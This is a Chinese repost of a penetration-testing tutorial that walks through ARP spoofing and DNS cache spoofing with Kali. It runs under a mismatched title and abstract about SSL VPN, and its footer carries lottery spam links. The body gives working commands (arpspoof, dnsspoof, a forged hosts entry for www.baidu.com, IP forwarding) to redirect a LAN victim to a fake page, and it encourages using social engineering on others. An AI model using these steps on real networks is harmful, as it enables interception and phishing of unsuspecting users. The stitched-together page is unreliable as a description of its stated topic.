安基网 首页 安全 攻防案例 查看内容

SSL VPN基本工作原理介绍

2020-1-26 14:01| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 我们之前说到IPsec VPN远程接入方式,那这种接入方式有一个弊端,那就是必须要在电脑上安装VPN Client软件,在一台没有安装VPN Client软件的电脑上是不能建立IPsec VPN连接的,相当于IPsec VPN是C/S架构的。虽然在电脑上装个VPN Client软件并不是什么难事,但是假设出差在外你没有带电脑,或者在客户那 ...

DNS缓存攻击原理

除了ARP缓存攻击,还可欺骗域名服务器(DNS)的缓存条目(从域名到IP地址的映射)。我们需要实现当目标访问某些特定网站时,我们把这些流量转发到一个被我们控制的站点。

ARP解析协议处理的是IP和MAC地址之间的关系。

DNS映射(解析)处理的是把www。xxx。com之类的域名解析到相应的IP地址上。

DNS解析原理

总之,实际中我们在上网的时候,都是请求域名(比如www。baidu。com),然后域名在本地DNS缓存中寻找域名对应的IP地址,如果找不到,就继续去远程DNS服务器中寻找该域名的IP,一旦找到,也就完成了域名到IP访问的解析,实现了访问域名,其实就是访问域名与之绑定的IP。

如下图:

显示www.toutiao.com域名对应的IP有很多(使用了CDN,不一定是服务器IP

kali下nslookup查询IP

最终,用户就可以在不需要知道确定IP的情况下通过URL实现网站的访问(大多数网站使用IP是无法访问的)

入门(DNS缓存攻击)

DNS缓存攻击就是使用主机发送一堆的DNS域名解析指向一个错误ip(我们kali的IP),也就是说让他人访问www.baidu.com时,本地DNS域名解析服务器将该域名指向我们的kali ip,那么他人自动就会链接到我们的kali主机设置的冒牌baidu页面。

首先,要在kali上开启Apache2服务:

在kali终端下输入:

service apache2 start

为什么要开启这个呢,我们要在这里kali的apache2服务器中放入我们的冒牌baidu网页(你可以随便去网上复制一个,也可以自己制作一个)

在卡里的主目录下,找到"其他位置",找到"计算机",然后在里面找到该路径"usr/www/html"目录(一定要参考视频去找到!)

将html目录中的所有文件都删掉!然后放置一份index.html(html超文本网页代码)的文件,该文件内容如下:

<!DOCTYPE html>

<html>

<head>

<meta http-equiv="content-type" content="text/heml; charset=utf-8">

<title>关注今日头条号——“骆训森”</title>

<meta name="keywords" content="test">

<meta name="description" content="test website">

</head>

<body>

<h1>欢迎大家学习kali渗透测试课程!</h1>

</body>

<footer>

<p>By 骆训森 原创制作</a>

</footer>

</html>


需要这个index.html文件的,已经放在会员群云盘共享文件夹中!需要可以关注我,然后私信我获取即可!

创建一个DNS域名解析的文件(我们随便冒牌一个真实存在的域名网址www。baidu。com)

在kali终端中输入:

echo 192.168.31.206 www.baidu.com > hosts.txt

这里是将"192.168.31.206 www.baidu.com"写入文件hosts.txt中,如果hosts.txt不存在,就会自动创建的!

如下图,首先往文件写入域名解析,然后使用cat查看是否写入成功!

开始DNS欺骗攻击

首先要在kali中开启路由转发:

在kali的终端下输入

echo 1 > /proc/sys/net/ipv4/ip_forward

开启目标靶机(ubuntu)和网关之间的流量劫持:

在kali终端下输入

arpspoof -i eth0 -t 192.168.31.178 192.168.31.1

arpspoof -i eth0 -t 192.168.31.1 192.168.31.178

接着使用dnsspoof工具进行DNS欺骗

在kali的终端下输入

dnsspoof -i eth0 -f hosts。txt

上面以及开启了DNS欺骗攻击,达到使目标ubuntu访问www.baidu.com时出现我们设置的冒牌页面的目的。

先别急,先在ubuntu中ping下www。baidu。com域名的ip值

发现了啥?www.baidu.com的ip怎么变成了kali的ip呢?这就表明ubuntu此时只要通过浏览器访问www.baidu.com这个网址,不会跳动真正的baidu页面,而是重定向到我们这台恶意的服务器kali apache2中的var/www/html/中的index.html所展现的网页页面!

重定向到我们的kali的ip

我们来使用ubuntu的火狐浏览访问www.baidu.com网址验证下:

仔细看看,明明访问的是www.baidu.com,可是这里显示的是我kali自己配置的网页!脑洞大开!突然邪恶了下!要知道,实际应用中并不用触碰目标主机!(目前仅限局域网主机)

自动访问到我们的kali web页面

这可不是真正的www。baidu。com主页啊!

到目前为止,我们已经学会了使用DNS缓存欺骗攻击!让目标主机访问的特定页面重定向到我们kali的主机下,真是很好玩!另外这里我们可以选择社工方法将你要他人打开的连接,他人会以为是正常网页,每想到一打开就会定向到你kali主机的虚假主页中,其余的大家自行发挥吧!

再次重申,请勿用于恶作剧和非法使用!否则后果自负!



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6754681768755855876/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
W彩票计划群 爱投彩票计划群 山东11选5开奖 玩彩票计划群 财神汇彩票计划群 环球彩票计划群 湖北快3开奖 北京极速赛车软件 爱投彩票计划群 爱投彩票计划群